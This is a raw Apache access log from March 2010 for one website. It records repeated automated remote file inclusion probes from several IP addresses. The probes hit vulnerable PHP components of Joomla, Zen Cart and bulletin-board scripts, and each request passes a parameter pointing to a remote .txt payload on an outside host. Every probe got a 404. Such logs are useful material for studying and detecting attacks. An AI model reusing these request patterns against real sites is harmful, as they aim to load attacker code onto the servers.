203.250.124.252 - - [11/Mar/2010:08:43:32 -0800] "GET /logs/access.log//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:43:32 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:25 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:25 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:25 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:42 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:42 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:44:42 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:08:46:00 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:08:46:00 -0800] "GET /logs/access_100224.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:08:46:00 -0800] "GET /logs/access_091228.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:08:46:00 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:46:04 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:08:46:22 -0800] "GET /logs/access.log/?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:46:40 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:48:58 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:48:58 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:48:58 -0800] "GET /logs/access_091228.log//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:51:12 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:51:12 -0800] "GET /logs/access_091228.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:51:15 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:51:27 -0800] "GET /logs/access.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:52:03 -0800] "GET /logs/access_100121.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:52:03 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:52:03 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:15 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /logs/access_091228.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:16 -0800] "GET /logs/access_091228.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:17 -0800] "GET /delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:18 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:30 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:32 -0800] "GET /delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:35 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:41 -0800] "GET /delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:41 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:41 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:08:52:44 -0800] "GET /logs/access.log//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:51 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:51 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.180.124.146 - - [11/Mar/2010:08:52:52 -0800] "GET /delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:56 -0800] "GET /logs/access.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:08:52:57 -0800] "GET /logs/access.log%20%20//skin/zero_vote/admin.php?dir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:53:27 -0800] "GET /logs/access_100121.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:53:27 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:53:27 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:55:05 -0800] "GET /logs/access_100121.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:55:05 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.81.242 - - [11/Mar/2010:08:55:06 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:10 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:10 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:10 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:43 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:43 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:52 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:54 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:54 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:55:54 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:56:02 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:56:02 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:08:56:02 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:03 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:03 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:03 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:13 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:15 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:15 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:15 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:33 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:33 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:33 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:50 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:50 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:08:56:50 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:15 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:15 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:15 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:16 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:16 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:08:57:16 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:08:58:17 -0800] "GET /logs/access.log/?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:51 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:51 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:51 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:58 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:58 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:58:59 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:14 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:14 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:14 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:14 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:14 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:08:59:17 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:17 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:17 -0800] "GET /logs/access_090901.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:17 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:25 -0800] "GET /logs/access_090901.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:25 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:09:01:25 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
